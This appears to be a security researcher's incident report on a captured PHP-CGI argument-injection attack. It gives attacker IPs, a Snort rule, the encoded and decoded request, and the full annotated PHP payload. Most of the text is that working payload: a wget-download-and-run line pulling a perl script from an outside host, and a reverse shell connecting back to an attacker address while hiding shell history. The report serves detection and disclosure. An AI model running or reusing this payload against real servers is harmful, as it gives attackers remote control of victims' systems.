- PHP-CGI argument injection attempt (CVE-2012-1823 family, see the rule below): a reverse-shell payload delivered through auto_prepend_file=php://input
- Reported by neonprimetime security
- http://neonprimetime.blogspot.com
- *****
- Source IP: 212.93.4.20
- *****
- Payload (indicators referenced by the injected code below):
- 178.254.32.171 — passed as the sole argument to the downloaded perl script (presumably its C2 address; not confirmed here)
- 91.121.107.56 — download host for the second stage (fetched with wget)
- 91.121.105.21 — reverse-shell connect-back target, TCP port 22
- http://91.121.107.56/MSI/AT/.o/hb/php02 — second-stage perl script, written to /tmp/.0e1bc.log, run with perl, then deleted
- *****
- Rule alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP PHP-CGI remote file include attempt"; flow:to_server,established; content:"auto_prepend_file"; http_uri; metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http; reference:cve,2012-1823; reference:cve,2012-2311; reference:cve,2012-2335; reference:cve,2012-2336; classtype:attempted-admin; sid:22063; rev:9; )
- Note: the `content:"auto_prepend_file"; http_uri;` match is evaluated against the normalised (percent-decoded) URI buffer, which is why it fires on the fully hex-encoded query string below; a plain raw-payload content match would not. The rule only covers the inbound request — the outbound connect-back to 91.121.105.21:22 and the wget to 91.121.107.56 need separate egress detection.
- POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E
- Decoded query string: -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
- Because vulnerable php-cgi builds pass the query string as command-line arguments (CVE-2012-1823), each -d overrides a php.ini directive, -n ignores php.ini entirely, and auto_prepend_file=php://input makes the POST body (the code below) execute before any script; the remaining directives strip the usual sandboxing (safe_mode, open_basedir, disable_functions, Suhosin).
- <?php
- // Stage 1: fetch a second-stage perl script from 91.121.107.56, run it with 178.254.32.171 as its
- // only argument, then delete it. The dot-prefixed /tmp/.0e1bc.log name and the .log suffix hide a
- // perl script, not a log. In sh the trailing `&` binds only to the final `rm`, so system() blocks
- // until wget and perl have returned before the reverse shell below starts (unless the perl script
- // daemonises itself — cannot tell from here).
- system("wget 91.121.107.56/MSI/AT/.o/hb/php02 -O /tmp/.0e1bc.log;perl /tmp/.0e1bc.log 178.254.32.171;rm -rf /tmp/.0e1bc.log &");
- // NOTE(review): the paste shows set_time_limit(0) immediately after the closing tag with no
- // reopening `<?php`; as captured, everything after `?>` would be emitted as literal output rather
- // than executed. The opening tag was most likely lost when the payload was copied.
- ?>set_time_limit(0);
- // Reverse-shell parameters (pentestmonkey-style php-reverse-shell layout). Connect-back target is
- // 91.121.105.21:22 — port 22 is likely chosen so the outbound session looks like SSH to egress filters.
- $ip = '91.121.105.21';
- $port = 22;
- $chunk_size = 1400;   // bytes per fread() from the socket and the shell pipes
- $write_a = null;      // write/error sets for stream_select(); never populated, only reads are watched
- $error_a = null;
- // Command handed to proc_open: suppress shell history, fingerprint the host, then interactive sh.
- $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
- $daemon = 0;  // set to 1 after a successful fork + setsid; printit() tries to read it (see note there)
- $debug = 0;   // non-zero makes printit() trace every read in the relay loop
- // Detach from the PHP-CGI request (single fork + setsid) so the shell outlives the HTTP
- // connection. Requires the pcntl extension; without it the shell runs inside the request
- // process and the code merely warns and carries on.
- if (function_exists('pcntl_fork')) {
- .$pid = pcntl_fork();.
- .if ($pid == -1) {
- ..printit("ERROR: Can't fork");
- ..exit(1);
- .}
- .// Parent exits so the request can complete; the child continues below.
- .if ($pid) {
- ..exit(0);
- .}
- .// New session: drops the controlling terminal / process group of the CGI parent.
- .if (posix_setsid() == -1) {
- ..printit("Error: Can't setsid()");
- ..exit(1);
- .}
- .$daemon = 1;
- } else {
- .printit("WARNING: Failed to daemonise.");
- }
- chdir("/");  // don't keep the web root (or any mount) busy as the cwd
- umask(0);
- // Connect back to the attacker with a 30 s timeout; a failed connect aborts the whole payload.
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock) {
- .printit("$errstr ($errno)");
- .exit(1);
- }
- // Spawn the shell with stdin/stdout/stderr all piped so a single select loop can relay them.
- $descriptorspec = array(
- 0 => array("pipe", "r"),
- 1 => array("pipe", "w"),
- 2 => array("pipe", "w")
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process)) {
- .printit("ERROR: Can't spawn shell");
- .exit(1);
- }
- // Non-blocking on every stream so a slow side never stalls the relay.
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- // Relay loop: attacker socket -> shell stdin; shell stdout/stderr -> socket, $chunk_size bytes at a
- // time. stream_select() is called with a null timeout, so each iteration blocks until at least one
- // stream is readable. fwrite() return values are ignored, so a short write would silently drop data.
- while (1) {
- .// Either side hanging up ends the session.
- .if (feof($sock)) {
- ..printit("ERROR: Shell connection terminated");
- ..break;
- .}
- .if (feof($pipes[1])) {
- ..printit("ERROR: Shell process terminated");
- ..break;
- .}
- .// stream_select() narrows $read_a in place to just the streams that are ready.
- .$read_a = array($sock, $pipes[1], $pipes[2]);
- .$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- .if (in_array($sock, $read_a)) {
- ..if ($debug) printit("SOCK READ");
- ..$input = fread($sock, $chunk_size);
- ..if ($debug) printit("SOCK: $input");
- ..fwrite($pipes[0], $input);
- .}
- .if (in_array($pipes[1], $read_a)) {
- ..if ($debug) printit("STDOUT READ");
- ..$input = fread($pipes[1], $chunk_size);
- ..if ($debug) printit("STDOUT: $input");
- ..fwrite($sock, $input);
- .}
- .if (in_array($pipes[2], $read_a)) {
- ..if ($debug) printit("STDERR READ");
- ..$input = fread($pipes[2], $chunk_size);
- ..if ($debug) printit("STDERR: $input");
- ..fwrite($sock, $input);
- .}
- }
- // Teardown after the loop breaks: close the socket and all three pipes, then reap the shell.
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- // Diagnostic printer, meant to go quiet once daemonised. However $daemon is never imported with
- // `global`, so inside the function it is an undefined (null) variable: !$daemon is always true and
- // every message is printed regardless — a long-standing quirk of this reverse-shell template.
- function printit ($string) {
- .if (!$daemon) {
- ..print "$string
- ";
- .}
- }
- // Reached only after the relay loop ends; the payload always exits non-zero.
- exit(1);
- ?>